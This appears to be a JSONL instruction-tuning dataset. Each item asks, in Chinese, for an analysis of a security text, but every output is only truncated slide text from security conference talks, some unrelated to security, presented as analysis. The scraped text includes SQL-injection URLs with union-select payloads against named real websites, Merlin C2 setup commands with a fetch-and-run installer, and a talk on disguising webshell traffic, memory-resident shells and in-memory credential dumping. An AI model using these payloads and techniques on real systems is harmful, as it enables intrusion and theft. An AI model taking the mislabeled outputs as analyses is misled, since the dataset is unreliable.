said techniques. Legal Statement: The following demonstration does violate YouTubes terms of service, MySpaces terms of service, and the Digital Millennium Copyright Act, and intellectual property rights, should you download copyrighted materials. YOUR USE OF THE INCLUDED TECHNIQUES SHALL BE AT YOUR OWN RISK. YOUR OWN RISK. IN NO EVENT SHALL THE PRESENTER, DEFCON, OR ANY DEFCON EMPLOYEES, BE LIABLE TO YOU FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES WHATSOEVER RESULTING FROM AN", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 简介 ## 攻击模式 在我们攻击一个密码学系统时我们或多或少会得到关于这个系统的一些信息根据得到信息量的不同我们可以采用的方法就可能不同在当今的密码学分析时一般我们都会假设攻击者知道密码学算法这个假设是合理的因为历史上有很多保密的算法最后都被人所知比如 RC4被知道的方式多重多样比如间谍逆向工程等 这里我们根据攻击者获取密码学系统的信息的多少将攻击模式分为以下几类 - **唯密文攻击**攻击者仅能获得一些加密过的密文 - **已知明文攻击**攻击者有一些密文对应的明文 - **选择明文攻击**攻击者在开始攻击时可以选择一些明文并获取加密后的密文如果攻击者在攻击中途可以根据已经获取的信息选择新的明文并获取对应的密文则称为适应性选择明文攻击 - **选择密文攻击**攻击者在开始攻击之前可以选择一些密文并获取解密后的明文如果攻击者在攻击图中可以根据已经获取的信息选择一些新的密文并获取对应的明文则称为适应性选择密文攻击 - **相关密钥攻击**攻击者可以获得两个或多个相关密钥的加密或解密后的密文或明文但是攻击者不知道这些密钥 ## 常见攻击方法 根据不同的攻击模式可能会有不同的攻击方法目前常见的攻击方法主要有 - 暴力攻击 - 中间相遇攻击 - 线性分析 - 差分分析 - 不可能差分分析 - 积分分析 - 代数分析 - 相关密钥攻击 - 侧信道攻击 ## 参考文献 - https://zh.wikipedia.org/wiki/%E5%AF%86%E7%A0%81%E5%88%86%E6%9E%90", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCisco Confidential 1  2009 Cisco Systems, Inc. All rights reserved. NG Update Copyright  2010 Cisco Systems, Inc. All rights reserved. Cisco Confidential Panini Inter-VM data exfiltration The art of cache timing covert channel on x86 multi-core Etienne Martineau Kernel Developer August 2015  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 2 NG Update VM #1 client VM #2 server  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 3 NG Update Research own time my opinions not my employers The information and the code provided in this presentation is to be used for educational purposes only. I am in no way responsible for any misuse of the information provided. In no way should you use the information to cause any kind of damage directly or indirectly. Disclaimer  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 4 NG Update About me  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 5 NG Update  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 6 NG Update VM #2 VM #1  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 7 NG Update  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 8 NG Update VM#1 Modulate a contention pattern 1 | 0 | 0 | 0 | 1 MUL | NOP | NOP | NOP | MUL  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 9 NG Update VM#1 Modulate a contention pattern 1 | 0 | 0 | 0 | 1 MUL | NOP | NOP | NOP | MUL VM#2 Detect BUS contention Slow| Fast| Fast| Fast| Slow 1 | 0 | 0 | 0 | 1  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 10 NG Update  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 11 NG Update  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 12 NG Update Video #1  2009 Cisco Systems, Inc. All rights reserved. Cisco Confidential 13 NG Update Goal  Practical implementation ( not just some research stuff ) How  Abusing X86 shared resources  Cache line encoding / decoding  Getting around the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n与业务融合的漏洞检测之路 关于我  乌云白帽子 猪猪侠  8年信息安全从业经历  信息安全领域爱好者  安全测试  数据挖掘  微博@ringzero DEMO 1 WEB2.0服务端 复杂的用户认证机制传统漏 洞扫描器无法与业务功能交互 http://v.youku.com/v_show/id_XODc0NjYyODg0.html DEMO 2 移动客户端 功能封闭导致漏洞扫描器无 法与业务功能交互 http://v.youku.com/v_show/id_XODc0Njc1MzI0.html 旁路传感器还原数据分析出攻击行为 使用业务系统时从数据流量中检测业务流程漏洞 什么是业务安全 连接彼此交换信息 保护信息在交换过程中的完整性可用性保密性 什么是业务安全 Information Technology IT 操作系统数据库 应用代码指的是技术(基础设施) 信息指的是业务数据也就是我们要真正要保护的对象 怎么找业务系统的漏洞  跟随业务系统内的每一个功能 智能检测缺陷 规则太多 不能通用 错误率高 人机互动 怎么找业务系统的漏洞  跟随业务系统内的每一个功能  代码设计(关系型数据库) 增删改查CURD  创建Create# 发布一条微博  删除Delete# 删除一条微博  更新Update# 修改用户资料  读取Retrieve# 查看好友们最新发布的微博 一些案例 案列1有排序的地方 案列2有分页的地方 http://apps.2012.qq.com/guess/list-tid--stat-4?sort=de sc,if%28%281=2%29,1,%28select/**/1/**/from/**/INFORMAT ION_SCHEMA.TABLES%29%29%20asc 案列3有搜索的地方 案列4有分类的地方 案列5有选择的地方 http://life.tenpay.com/cgi-bin/mobile/mobile_order_que ry.cgi?g_tk=1233447418&tid=01001004&showtry=1& amp;chg mobile=13800138000&uin=uid&startdate=20130108& enddate =20130408&state=0/**/union/**/select/**/1,2,3,4,5,6,7, user%28%29,9,0%23 怎么找业务系统的漏洞  跟随业务系统内的每一个功能  代码设计(关系型数据库)  每个业务都有自身的业务流程 增删改查CURD  创建Create# 发布一条微博  删除Delete# 删除一条微博  更新Update# 修改用户资料  读取Retrieve# 查看好友们最新发布的微博 安全是一个整体保证安全不在于强大的地方有多强大 而在于真正薄弱的地方在哪里 DNS安全--万网(这不是XSS) 最安全的DNS 找回密码设计--业务流程安全 How?  基于开源 Python,Mysql,Linux,Phantomjs, Redis,Celery,Nmap,Php  脚本套脚本  队列管理拥塞出错  分布式框架 模块关系 Redis 数据存储进程通信 Worker1 WorkerN Worker2 监控后台 下达命令 执行命令 报告状态 查看状态 数据代理 放入任务 处理任务 查询优先 错误处理 异步检测队列工作原理 任务队列 流量分析 控制台 producer Worker1 Worker2 WorkeN  push pop 客户端 业务数据流 数据代理 Proxy  数据代理采集流量  控制台分析数据向队列压入任务  Redis队列系统等待Worker取任务  Worker执行任务并返回结果存储到数据库 任务队列的Redis存储设计 md5 Task (json) 任务md5索引 Hash 任务队列1 List 故障队列1 List 任务队列2 故障队列2 Push 任务队列和错误队列一一对应方便管理 Worker模型 扫描线程1 扫描线程 2 扫描线程 N 扫描线程管理器 指令线程Command thread Celery 配置中心 扫描队列 扫描队列 调度 错误队列 状态 报告 worker Redis 任务 报告 报告 pull push worker指令线程工作机状态报告线程工作调度杀死/取消进程 Task可报告工作进程的pid监控后台可下指令杀死卡死的进程 Worker管理 Worker任务状态管理 Worker线程池 简单不简单  摩尔定律带来灾难  生产力释放  社区更加开放  漏洞规则库  330个漏洞利用脚本 Apache Geronimo Default Administrative Cred", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npin2pwn: How to Root an Embedded Linux Box with a Sewing Needle Brad Dixon - Carve Systems DEF CON 24  It works  Easy  Teachable  Dramatic USEFUL NOVELTY  Risky  Crude  Perhaps redundant Demo Prior Art  Significant body of work around fault injection and glitching at the IC level for secure processors  Recent system-level applications: - 2004: WRT54 Bricked Router recovery, Administrator note by mbm - How to Hack the Hudl  We give Rockchip a good seeing to, Pen Test Partners blog post - 20 Devices in 45 Minutes, CJ Heres et. al., DEF CON 22 (related) - WINKHUB Side Channel Attack, Kevin2600, 2016 - Getting Root on a Philips Hue Bridge, Colin OFlynn, 2016 For today  When this attack can be effective  Why this attack works  How to defend against this attack RISKS TO HARDWARE  I have not yet destroyed hardware but this is abuse of semiconductor devices.  Use on equipment you can afford to destroy.  Depending on the hardware you may have better and safer options. Use those first. 102 Generic Networked Doohickey Product Design Order of Attack 1. Serial 2. JTAG 3.  4. Flash to CPU interface CPU Flash Ethernet Memory Serial JTAG Other I/O Parallel or SPI flash poke here Why does this work?  Disrupt boot chain with a transient fault  Activate an unexpected failure path Boot loader Kernel load to RAM Scan / Mount ? Init / Start App poke now or now Scenario #1: Exploitable U-Boot Configuration 1. No JTAG. 2. Homegrown secure boot 3. Try to load and boot kernel #1 4. Try to load and boot kernel #2 5. If that fails then return to U-Boot prompt! Scenario #2: Exploitable Init Configuration  /bin/init reads /etc/inittab  /bin/init runs /etc/rc  /etc/rc starts application in the foreground  Application grabs console and presents a login prompt with credentials we dont know  BUT if the application fails to load then /bin/init runs /bin/sh How To Using LTE Router #4 How To  Survey HW  Identify ports to monitor boot  Datasheets  Inspect failure modes, if possible  Get boot timing Prepare ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# merlin --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **项目地址** - https://github.com/Ne0nd0g/merlin - https://github.com/Ne0nd0g/merlin-agent - https://github.com/its-a-feature/Mythic - https://github.com/MythicAgents/merlin **使用文档** - https://merlin-c2.readthedocs.io/en/latest/index.html --- ## 安装 **Server 安装** ```bash mkdir /opt/merlin;cd /opt/merlin wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z 7z x merlinServer-Linux-x64.7z # 密码 merlin sudo ./merlinServer-Linux-x64 ``` **Agent 下载** ``` https://github.com/Ne0nd0g/merlin/releases/download/v1.4.1/merlinAgent-Darwin-x64.7z https://github.com/Ne0nd0g/merlin/releases/download/v1.4.1/merlinAgent-Linux-x64.7z https://github.com/Ne0nd0g/merlin/releases/download/v1.4.1/merlinAgent-Windows-x64.7z ``` **通过 f8x 进行安装** ```bash wget -O f8x https://f8x.io/ bash f8x -merlin ``` --- ## 使用 运行 server 端,配置监听器,然后 agent 运行时配置 server 端地址,即可 server 端使用和 msf 框架很像 ```bash merlinServer ``` `help` 可以查看在当前状态下可用的命令 输入 `listeners` 配置监听器 输入 `use https` 使用 https 协议 输入 `info` 查看当前监听器的信息 输入 `start` 开启监听 ``` listeners use https info start ``` 可以看到它默认监听 127.0.0.1 输入 `set` 配置监听的接口 ```bash set Interface 0.0.0.0 info ``` `restart` 一下 ``` restart ``` 这个时候我们可以测试 agent 端上线的效果了 这里我拿 win11 为例 可以看到有新会话上线了 输入 `sessions` 输入 `main` 回到主菜单 输入 agent interact 加上 agent guid 来进行交互 ``` main agent list agent interact 0a83d6dd-6b84-44c8-bedd-7a512a8b8a3a ``` 然后执行个命令测试一下 ``` run ping 114.114.114.114 ``` 可以看到,执行命令有一定的延迟,猜测应该是和默认的心跳值有关", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n高级攻防下的WEBSHELL About Me 0 1 \"张一臣 BeichenDream; \"360政企安全-高级攻防实验室-安全研究资深工程师 \"JVM安全研究者 \"哥斯拉作者 目录 CONTENTS 0 1 01 PART\"01 流量对抗 02 PART\"02 武器化 03 PART\"03 内存马 05 PART\"05 Agent对抗 06 PART\"06 正向代理 07 PART\"07 哥斯拉插件扩展 04 PART\"04 Java反射绕过 PART.01\" 0 2 对抗流量审查 \" 伪装正常业务的流量 为什么要对抗流量审查 0 1 蚁剑 \"防止流量被他人窃取分析 \"不想被人发现异常流量 \"防止被WAF拦截 冰蝎 哥斯拉 三大常用webshell默认流量 将哥斯拉流量扩展成Html之扩展请求包 0 1 不支持扩展的shell不是好shell 扩展时尽量模仿正常业务请求流量 扩展时尽量模仿正常业务返回流量 模仿某搜索引擎流量 1. 截取任意post表单请求数据 2. 选取rsv_t参数作为密码 3. 重新生成一个shell 密码为rsv_t的参数 4. 设置请求追加数据 将哥斯拉流量扩展成Html之扩展返回包 0 1 不支持扩展的shell不是好shell 扩展时尽量模仿正常业务请求流量 扩展时尽量模仿正常业务返回流量 模仿某搜索引擎流量 5. 截取任意页面将shell放入任何位置 将哥斯拉流量扩展成Html之查看扩展成果 0 1 不支持扩展的shell不是好shell 扩展时尽量模仿正常业务请求流量 扩展时尽量模仿正常业务返回流量 模仿某搜索引擎流量 6. 查看成果 它就像是正常的业务流量一样且可以被渲染 将哥斯拉流量扩展成Json之扩展请求包 0 1 不支持扩展的shell不是好shell 扩展时尽量模仿正常业务请求流量 扩展时尽量模仿正常业务返回流量 模仿正常业务Json流量 1. 截取任意json请求数据 2. 生成一个默认的shell 3. 选取数据出现位置 这里选择encrypt参数尾部 4. 设置请求追加数据 将哥斯拉流量扩展成Json之扩展返回包 0 1 不支持扩展的shell不是好shell 扩展时尽量模仿正常业务请求流量 扩展时尽量模仿正常业务返回流量 5. 手动解析encrypt值分离出哥斯拉流量 6. 将Payload的返回值赋值给result->user 7. 将result对象作为json输出 模仿正常业务Json流量 将哥斯拉流量扩展成json之查看扩展成果 0 1 不支持扩展的shell不是好shell 扩展时尽量模仿正常业务请求流量 扩展时尽量模仿正常业务返回流量 9. 查看成果 它就像是正常的业务流量一样且可以被解析 模仿正常业务Json流量 哥斯拉流量扩展之查看扩展成果 0 1 不支持扩展的shell不是好shell 扩展时尽量模仿正常业务请求流量 扩展时尽量模仿正常业务返回流量 PART.02\" 0 2 将Webshell武器化 \" Pty \"内存加载 \" 后渗透 全交互的Pty\"shell 0 1 \"Linux下采用python\"pty模块 \"Windows\"采用Winpty &\"shellhost \"客户端使用jediterm解析Pty数据流 内置多个权限提升模块 0 1 \"BadPotato  SweetPotato  EfsPotato \"由于IIS是服务权限拥有模拟Token权限 所以提权利用使用稳定性比较高的Potato \"权限提升后哥斯拉会保存高权限token以供后利用做准备 \"权限提升后可直接以高权限账户运行Mimikatz \"这全过程都是在内存中运行的 没有任何文件落地 \"内存运行技术采用pe_to_shellcode 在内存中运行任意可执行程序 0 1 \"可自定义程序参数 \"支持x86/x64可执行程序 \"可自定义远程进程/pid 提权后一键运行Mimikatz 0 1 \"提权后可一键抓取系统密码 \"提权后可以以高权限执行shellcode \"直接以高权限用户上线msf/cs PART.03\" 0 2 内存马 \" asp.net(iis)\"\"\"虚拟目录与MVC内存马 \" Java\"Agent\"通用内存马 \" 在仅执行命令情况下获得内存马 asp.net(iis)\"\"内存马 0 1 \"为了获得更完整的控制功能 \"不会在磁盘残留文件 \"可绕过静态查杀 asp.net(iis)\"\"虚拟目录内存马 0 1 \"asp.net在每个请求到达Page\"Resource时会执行 HostingEnvironment.VirtualPathProvider.GetCacheKey获取缓存Key asp.net(iis)\"\"虚拟目录内存马 0 1 \"所以我们可以把HostingEn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n. . . . . . . .. . . . . eXercise In Messaging and Presence Pwnage fun with XMPP Ava Latrope iSEC Partners Defcon 17 Ava Latrope (iSEC Partners) eXercise In Messaging and Presence Pwnage Defcon 17 1 / 32 . . . . . . Introduction Outline Outline .. .1 Introduction The basics Common Stanzas ...2 The victims Clients Servers .. .3 Attack scenarios DoS, DoS, and more DoS XML Parsing File/Image Upload ...4 Tools Persimmon Proxy XMPP Fuzzer .. .5 Conclusion Ava Latrope (iSEC Partners) eXercise In Messaging and Presence Pwnage Defcon 17 2 / 32 . . . . . . Introduction Who am I? Who am I? Security Consultant, iSEC Partners Prior to that, QA automation for various web 2.0 horrors Eats babies Ava Latrope (iSEC Partners) eXercise In Messaging and Presence Pwnage Defcon 17 3 / 32 . . . . . . Introduction The basics What is XMPP? eXtensible Messaging and Presence Protocol Formerly the Jabber project Specialized XML-based protocols, used for: content syndication file sharing ...but, well, still mostly IM. Ava Latrope (iSEC Partners) eXercise In Messaging and Presence Pwnage Defcon 17 4 / 32 . . . . . . Introduction The basics Why am I picking on it? Ubiquity Open standard RFC Process Many implementation details are at the discretion of the developer ...anyone whos met a developer should be worried by that sentence As much fun as youd expect with regular XML parsing Ava Latrope (iSEC Partners) eXercise In Messaging and Presence Pwnage Defcon 17 5 / 32 . . . . . . Introduction The basics How it works Decentralized Addressing via JIDs of the format user@server TLS encryption and SASL authentication HTTP binding XML stream Ava Latrope (iSEC Partners) eXercise In Messaging and Presence Pwnage Defcon 17 6 / 32 . . . . . . Introduction The basics Common Attributes to - recipient JID from - sender JID id Optional Generated for tracking purposes Scope of uniqueness is flexible type Specifies purpose of the stanza Each stanza variety has its own list of acceptable types xml:lang Only affect", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n10000 Yen Into the Sea Bio: Flipper Job Title:Engineering Technician What: Electric Vehicles Goal: Build a low cost underwater glider If you want to make an apple pie from scratch, you must first create the universe. - Carl Sagan What is an underwater glider? Underwater Gliders: -Highly efficient autonomous submarines that can travel long distances on battery power Background ARGO Floats http://www.argo.ucsd.edu/float_design.html http://www.argo.ucsd.edu/operation_park_profile.jpg http://www.webbresearch.com/pdf/EurekaMoment.pdf http://discovermagazine.com/1996/apr/athousanddivingr734 \"The Slocum Mission\" - Henry Stommel April 1989 - Oceanograpy Magazine http://auvac.org/uploads/publication_pdf/the_slocum_mission.pdf http://www.webbresearch.com/slocumglider.aspx \"Scarlet Knight\"  \"Scarlet Knight is 93 inches in length. Most of the gliders flown by Rutgers are 84 inches\"  23.8 kilograms of Batteries  59.1 liters displacement  ~4,500 mile trip  source:http://rucool.marine.rutgers.edu/atlantic/about_gliders.html  Lithium CSC @ 900Wh/kg =21.42kWh  source:http://www.electrochemsolutions.com/pdf/Echem%20Corporate%20Case%20Study_Slocum%20Glider.pdf How do you make an Underwater Glider? Design Spiral: 1. Define Requirements 2. Research 3. Buoyancy engine 4. Energy Storage 5. Attitude Control System 6. Hull Design 7. Testing Efficiency crucial elements of an Underwater Glider -Low Drag Hull Form -Buoyancy Engine Conservative:Torpedo(Myring 1976) Bold:Laminar Flow X-35(Carmichael 1966) Define Requirements: 1. Low Price($100 Target) 2. Difficulty of manufacture(In my boxers) 3. Range/Efficiency(Fingers crossed) Early Efforts During Learning Phase -Axial Piston Syringe Pump Research (Considered a variety of approaches)  High Test Peroxide  Free Piston Diesel  Hydraulic Pumps  Electric Motors  Linear Actuators  Wave Power/Solar Buoyancy Engine -Phase Change Material(\"PCM\") -Not N-Pentadecane(~10 degree C melting point) -Canning wax: http://en.wikipedia.org/wiki/Paraffin_wax \" In", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMouseJack: Injecting Keystrokes into Wireless Mice Marc Newlin | marc@bastille.net | @marcnewlin Marc Newlin Security Researcher @ Bastille Networks ((Mouse|Key)Jack|KeySniffer)  Wireless mice and keyboards  16 vendors  proprietary protocols (non-Bluetooth)  4 families of transceivers  16 vulnerabilities  keystroke sniffing  keystroke injection  many are unpatchable Types of vulnerabilities  Keystroke Injection  Unencrypted, targeting mice  Unencrypted, targeting keyboards  Encrypted, targeting keyboards  Keystroke Sniffing  Unencrypted keyboards  Forced Pairing  Logitech Unifying dongles  Keyboard disguised as mouse  Malicious macro programming  Delayed keystroke injection  Denial of service  Crash USB dongle firmware ShhhMouse Turns out everybody makes vulnerable devices... Prior Research Thorsten Schroeder and Max Moser (2010)  Practical Exploitation of Modern Wireless Devices (KeyKeriki)  Research into XOR encrypted Microsoft wireless keyboards Travis Goodspeed (2011)  Promiscuity is the nRF24L01+s Duty  Research into nRF24L pseudo-promiscuous mode functionality Samy Kamkar (2015)  KeySweeper  Microsoft XOR encrypted wireless keyboard sniffer How do mice and keyboards work? Peripherals send user input to dongle Dongle sends user input to computer An attacker can talk to your dongle... or eavesdrop on your unencrypted keyboard Background and Motivation \"Since the displacements of a mouse would not give any useful information to a hacker, the mouse reports are not encrypted.\" - Logitech (2009) Initial Logitech mouse research  USRP B210 SDR  Logitech M510 mouse  GNU Radio decoder  Good for passive RX  USB and CPU latency make two way communications tricky Burning Man to the rescue! (duh) NES controller internals  Arduino Nano  DC boost converter  nRF24L01+  vibration motor  WS2812B LED Logitech mouse hijacking NES controller Village Adventure by Marc Newlin IoT Village a Logitech mouse clicker did not like the hax NES Controller v2 (now with more things!) NES contr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploitable Assumptions Doktor Zoz, Dr. Foley, and Eric Schmiedl What the hell is a Hacker? What the hell is a Hacker? The movie does get a few things right Curiosity Assumptions and Authority! Hacker Mindset Good at spotting flaws, inefficiencies Must know how things work at any cost Boil things to most abstract level Are stubborn, with bloody-mindedness Constantly testing even if inconvenient Intuition of what is interesting to verify Willing to take risks and fail Доверяй, но проверяй Trust but verify --Ronald Reagan 1987 } Assumptions! Why do we care about those damned Assumptions? KRB4 zero-seed encrypt everyone assumed working because output looked encrypted and worked Buffer overruns Assumption that you will only write so much data SQL injections Assume that variables cannot affect flow control When you assume... Assumptions Aplenty Snake in the Peanut Brittle! No explanation needed Good looking websites and evil web design Assumption of similarity to physical storefronts Exploits assumptions of \"relevant info\" and \"not relevant\" through misleading graphic design Fighting Assumptions: Axiomatic Design aka WWNSD MIT Mechanical Engineering & KAIST: Design Methodology [Suh 2001] Solution neutral design process Excellent for discovering assumptions Dr. Nam Suh says: \"Assumptions make you stupid. No good! Y fail!\" Axiomatic Design Process Axiom 1: Decouple aka. Independence Axiom Within domain, elements MUST be independent! Problems arise when Customer needs assumed as functional requirements Functional requirements assumed as design parameters Contradictions lead to conflicts, lead to security holes Axiom 2: Reduce complexity aka Information Axiom Designs with least information increase robustness complexity opens \"arbitrage\" opportunities complexity vs. user centered design user workarounds create security holes Beware time dependence Some complexity is static, some is time dependent t-dependent combinatorial complexity -> chaos transform combinatorial into peri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0CTF WP Author:Nu1L Team 0CTF WP WEB amp2020 easyphp noeasyphp lottery Wechat Generator Pwn eeeeeemoji simple echoserver Chromium RCE Re babymips Happy Tree J w flash-1 Misc eeemoji Cloud Computing Cloud Computing v2 Crypto babyring WEB amp2020 dockerflagenvcouchDBcouchDBHTTP RCE/SSRF axios SSRFWAFWAF SSRFcouchDB flag curl http://aa015267de77493e88c837682b02c5668:iwantagirlfriend@127.0.0.1:5984/aa015 267de77493e88c837682b02c5668/flag AMPHTML (amphtml-validator)cheerio scriptchrome script IP127.0.0.1URLaxios couchDBcouchDBHTTP basic authcookie iframecouchDB(HTMLsrcHTTP basic auth) HTML/XSSchromeaxiosaxios SSRF couchDBleak flag 1. HTML cheerioamphtml-validatorbypass (noscriptiframeamphtml-validator) <script async src=\"https://cdn.ampproject.org/v0.js\"></script> <!doctype html> axios(metatargetiframe axios) 2. SSRFWAF axiosobject input[a]=xxx&input[b]=yyy{\"a\":\"xxx\",\"b\":\"yyy\"}axios <html amp lang=\"en\"> <head> <meta charset=\"utf-8\"> <script async src=\"https://cdn.ampproject.org/v0.js\"></script> <title>Hello, AMPs</title> <link rel=\"canonical\" href=\"https://amp.dev/documentation/guides-and- tutorials/start/create/basic_markup/\"> <meta name=\"viewport\" content=\"width=device-width,minimum-scale=1,initial- scale=1\"> <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;- ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp- start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp- start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp- start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp- start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp- start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms- animation:none;animation:none}</style></noscript> </head>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAugust 4-7, 2016 1 2 3 4 5 6 7 8 9 10 11 12 Exploit Mitigation Techniques on iOS Max Bazaliy A Journey Through August 4-7, 2016 About me 1 2 3 4 5 6 7 8 9 10 11 12 o From Kiev, Ukraine o Staff Engineer at Lookout o Focused on XNU, Linux and LLVM internals o Interested in jailbreak techniques o Worked on obfuscation and DRM in a past o Member of Fried Apple team August 4-7, 2016 Agenda 1 2 3 4 5 6 7 8 9 10 11 12 o iOS security mechanisms o Function hooking o iOS 8 & 9 exploit mitigations o Bypassing code signatures o Future codesign attacks August 4-7, 2016 o Memory protections o Code signing o Sandbox o Secure boot process o Data protection o Kernel Patch Protection 1 2 3 4 5 6 7 8 9 10 11 12 iOS security mechanisms August 4-7, 2016 o No way to change existing page permission o Pages can never be both writable and executable o No dynamic code generation without JIT o Non executable stack and heap o ASLR / KASLR 1 2 3 4 5 6 7 8 9 10 11 12 Memory protections August 4-7, 2016 1 2 3 4 5 6 7 8 9 10 11 12 Allocating new regions kern_return_t vm_map_enter(){! ...! #if CONFIG_EMBEDDED! if (cur_protection & VM_PROT_WRITE){! if ((cur_protection & VM_PROT_EXECUTE) && !entry_for_jit){! printf(\"EMBEDDED: curprot cannot be write+execute. turning off execute\\n);! cur_protection &= ~VM_PROT_EXECUTE;! }! }! #endif /* CONFIG_EMBEDDED */! ...! } http://opensource.apple.com//source/xnu/xnu-3248.20.55/osfmk/vm/vm_map.c! August 4-7, 2016 1 2 3 4 5 6 7 8 9 10 11 12 Changing existing regions kern_return_t vm_map_protect(){! ...! #if CONFIG_EMBEDDED! if (new_prot & VM_PROT_WRITE) {! if ((new_prot & VM_PROT_EXECUTE) && !(curr->used_for_jit)) {! printf(\"EMBEDDED: %s can't have both write and exec at the same time\\n\", __FUNCTION__);! new_prot &= ~VM_PROT_EXECUTE;! }! }! #endif! ...! } http://opensource.apple.com//source/xnu/xnu-3248.20.55/osfmk/vm/vm_map.c! August 4-7, 2016 o Mandatory Access Control Framework (MACF) o Code must be signed by trusted party o Signed page hashes match running cod", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNot So Super Notes How Well Does US Dollar Note Security Prevent Counterfeiting? Who?  Member of Technical Staff for VMware  Bachelors and Masters degree in Computer Science  Software engineer for almost 10 years  Love thinking about the limits of systems  Amateur lock-picker  Amateur beer brewer What?  The security of US dollar notes  How this security is implemented  The effectiveness of this security Why?  US dollar notes widely used  The value of US dollar notes is dependent on its security (among other things)  Counterfeiting can reduce the value of the dollar and potentially destabilize economies Scope  In  Only US dollar notes  Out  Coins  Other aspects of counterfeiting Warning/Disclaimer  Counterfeiting is a very serious crime, do not attempt under any circumstances  Making counterfeit dollars is bad, passing it is worse  It is on the short list of crimes defined directly in the US Constitution, along with piracy and treason US Dollar History  Prior to 1996, US dollar design had been mostly unchanged since 1928  The threat from advances in cheap color scanning and printing equipment prompted redesign efforts in 1993  Design security was revisited in 2006, 2007  Contributions to anti-counterfeit research were made by experts from institutions including: The National Academies, National Research Council, National Materials Advisory Board, IBM Research, Drexel University, New York University, Sandia National Laboratory, Rockefeller University, Innovative Technology Associates, University of Colorado Boulder, Apple Computer, University of Rochester, AT&T Bell Laboratories, University of Arizona Tucson, GE Aviation, Michigan State University, Xerox Innovation Group, Alfred University, Carnegie Mellon University, NASA Glenn Research Center, University of Michigan, Georgia Institute of Technology, University of Illinois at Urbana-Champaign, Rubenstein Studios, France Telecom, Microsoft, OFS Laboratories, Boeing, Wayne State University, AFL-CIO, Massachusetts Insti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFOR THE LOVE OF MONEY Finding and exploiting vulnerabilities in mobile point of sales systems LEIGH-ANNE GALLOWAY & TIM YUNUSOV POSITIVE TECHNOLOGIES MPOS GROWTH 2010 Single vendor 2018 Four leading vendors shipping thousands of units per day Motivations Motivations MWR Labs Mission mPOSsible 2014 Related Work Mellen, Moore and Losev Mobile Point of Scam: Attacking the Square Reader (2015) Related Work Research Scope Research Scope PAY PA L S Q U A R E I Z E T T L E S U M U P Research Scope How much security can really be embedded in a device that is free? Research Scope PHONE/SERVER HARDWARE DEVICE/PHONE MOBILE APP SECONDARY FACTORS Research Scope MERCHANT ACQUIRER CARD BRANDS ISSUER Background MPOS PROVIDER ACQUIRER CARD BRANDS ISSUER MERCHANT MERCHANT Background CARD RISK BY OPERATION TYPE Chip & PIN Chip & Signature Contactless Swiped PAN Key Entry Background EMV enabled POS devices make up between 90-95% of POS population E U E M V AC C E P TA N C E EMV enabled POS devices make up 13% of POS population and 9% of the ATM population 90% 13% U S E M V AC C E P TA N C E GLOBAL ADOPTION OF EMV - POS TERMINALS Background Around 96% of credit cards in circulation support EMV as a protocol E M V C R E D I T C AR D AD O P T I O N However less than half of all transactions are made by chip E M V C R E D I T C AR D U S AG E 96% 41% Background 79% of debit cards in circulation support EMV as a protocol E M V D E B I T C AR D AD O P T I O N However less than half of all transactions are made using chip E M V D E B I T C AR D U S AG E 79% 23% Background 46% 52 MILLIO N PERCENTAGE OF TRANSACTIONS MILLIONS OF NUMBER OF UNITS MPOS TIMELINE Background 46% 52 SCHEMATIC OVERVIEW OF COMPONENTS Background VULNERABILITIES SENDING ARBITRARY COMMANDS 